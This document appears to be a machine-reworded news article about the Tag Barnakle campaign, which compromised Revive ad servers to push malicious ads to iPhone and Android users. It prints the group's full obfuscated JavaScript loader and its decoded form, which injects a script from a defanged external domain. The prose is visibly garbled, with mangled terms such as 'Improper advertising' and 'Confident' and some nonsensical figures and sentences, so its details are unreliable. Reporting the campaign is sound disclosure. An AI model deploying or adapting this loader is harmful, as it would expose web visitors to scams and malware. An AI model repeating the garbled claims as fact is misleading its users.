Hackers have compromised more than 120 ad servers in the past year in an ongoing campaign that displays malicious ads on tens of millions, if not hundreds of millions, of devices as they visit sites that, by all appearances, they are benign.
Improper advertising is the practice of running ads to people as they visit trusted websites. The ads incorporate JavaScript that unfairly exploits software defects or attempts to trick visitors into installing an unsafe application, paying fraudulent computer support fees, or taking other harmful actions. The scammers behind this scourge on the Internet usually present themselves as buyers and pay for ad delivery networks to display malicious ads on individual sites.
Going after the jugular
Infiltrating the advertising ecosystem by positioning yourself as a legitimate buyer requires resources. First, scammers need to invest time learning how the market works and then create an entity that has a trustworthy reputation. The approach also requires paying money to buy space to run malicious ads. This is not the technique used by an advertising group that the security company Confiant calls Tag Barnakle.
“On the other hand, Tag Barnakle is able to completely circumvent this initial hurdle by going straight to the jugular – the mass compromise of the ad delivery infrastructure,” confident researcher Eliya Stein wrote in a blog post on Monday. “They can probably boast of an ROI [return on investment] which would eclipse rivals because they don’t have to spend any money to run advertising campaigns. ”
In the last year, Tag Barnakle has infected more than 120 servers running Revive, an open source application for organizations that want to run their own ad server, rather than relying on a third-party service. The figure is 120 times the number of Trusted infected Revive servers found last year.
After compromising an ad server, Tag Barnakle loads a malicious payload on it. To evade detection, the group uses the customer’s fingerprint to ensure that only a small number of the most attractive targets receive harmful ads. Servers that deliver a secondary payload to those targets also use covert techniques to ensure that they also fly under the radar.
Here is an overview:
Confident
When Confiant reported on Tag Barnakle last year, it found that the group had infected about 60 Revive servers. The phase allowed the group to distribute ads on more than 360 web properties. The ads generated fake Adobe Flash updates that installed malware on desktop computers when they ran.
This time, Tag Barnakle targets both iPhone and Android users. Websites that receive an ad through a compromised server provide extremely unclear JavaScript that determines whether a visitor is using an iPhone or Android device.
https://galikos[.]com/ci.html?mAn8iynQtt=SW50ZWwgSqW5jPngyMEludGVsKFIpIElyaXMoVE0OIFBsdXMgR3J3cGhpY37gNjU1
If visitors pass fingerprint and other tests, they receive a secondary payload that looks like this:
var _0x209b=["charCodeAt","fromCharCode","atob","length"];(function(_0x58f22e,_0x209b77){var _0x3a54d6=function(_0x562d16){while(--_0x562d16){_0x58f22e["push"](_0x58f22e["shift"]());}};_0x3a54d6(++_0x209b77);}(_0x209b,0x1d9));var _0x3a54=function(_0x58f22e,_0x209b77){_0x58f22e=_0x58f22e-0x0;var _0x3a54d6=_0x209b[_0x58f22e];return _0x3a54d6;};function pr7IbU3HZp6(_0x2df7f1,_0x4ed28f){var _0x40b1c0=[],_0xfa98e6=0x0,_0x1d2d3f,_0x4daddb="";for(var _0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0x40b1c0[_0xaefdd9]=_0xaefdd9;}for(_0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9]+_0x4ed28f["charCodeAt"](_0xaefdd9%_0x4ed28f[_0x3a54("0x2")]))%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f;}_0xaefdd9=0x0,_0xfa98e6=0x0;for(var _0x2bdf25=0x0;_0x2bdf25<_0x2df7f1[_0x3a54("0x2")];_0x2bdf25++){_0xaefdd9=(_0xaefdd9+0x1)%0x100,_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9])%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f,_0x4daddb+=String[_0x3a54("0x0")](_0x2df7f1[_0x3a54("0x3")](_0x2bdf25)^_0x40b1c0[(_0x40b1c0[_0xaefdd9]+_0x40b1c0[_0xfa98e6])%0x100]);}return _0x4daddb;}function fCp5tRneHK(_0x2deb18){var _0x3d61b2="";try{_0x3d61b2=window[_0x3a54("0x1")](_0x2deb18);}catch(_0x4b0a86){}return _0x3d61b2;};var qIxFjKSY6BVD = ["Bm2CdEOGUagaqnegJWgXyDAnxs1BSQNre5yS6AKl2Hb2j0+gF6iL1n4VxdNf+D0/","DWuTZUTZO+sQsXe8Ng==","j6nfa3m","Y0d83rLB","Y0F69rbB65Ug6d9y","gYTeJruwFuW","n3j6Vw==","n2TyRkwJoyYulkipRrYr","dFCGtizS","yPnc","2vvPcUEpsBZhStE=","gfDZYmHUEBxRWrw4M"];var aBdDGL0KZhomY5Zl = document[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[1]), qIxFjKSY6BVD[2])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[3]), qIxFjKSY6BVD[5]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[6]), qIxFjKSY6BVD[8]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[7]), qIxFjKSY6BVD[8]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[9]), qIxFjKSY6BVD[11]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[0]), qIxFjKSY6BVD[2]));var bundle = document.body||document.documentElement;bundle[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[10]), qIxFjKSY6BVD[11])](aBdDGL0KZhomY5Zl);
When decoded, the payload is:
var aBdDGL0KZhomY5Zl = document["createElement"]("script");
aBdDGL0KZhomY5Zl["setAtrribute"]("text/javascript");
aBdDGL0KZhomY5Zl["setAtrribute"]("src", "https://overgalladean[.]com/apu.php?zoneid=2721667");
As the defused code shows, the ads are broadcast overgalladean[.]com, an area that Confiant said is used by PropellerAds, an advertising network that security firms, including Malwarebytes, have long documented as harmful.
When Confiant researchers tracked the Propeller Ads click tracker on the types of devices targeted by Tag Barnakle, they saw ads like this:
Confident
Tens of millions served
The ads primarily target a list in the app store for fake security, security, or VPN apps with hidden subscription costs or "siphon traffic for harmful purposes."
With ad servers frequently integrated with multiple ad exchanges, ads have the potential to spread widely across hundreds, possibly thousands, of individual websites. Confident does not know how many end users are exposed to advertising, but the company considers that the number is large.
"If we consider the fact that some of these media companies have [Revive] Integrations with cutting-edge programmatic advertising platforms, Tag Barnakle's coverage is easily in the tens, if not hundreds of millions of devices, ”Stein wrote. "This is a conservative estimate that takes into account the fact that its victims cookies to reveal the low-frequency payload, which could slow down the detection of their presence."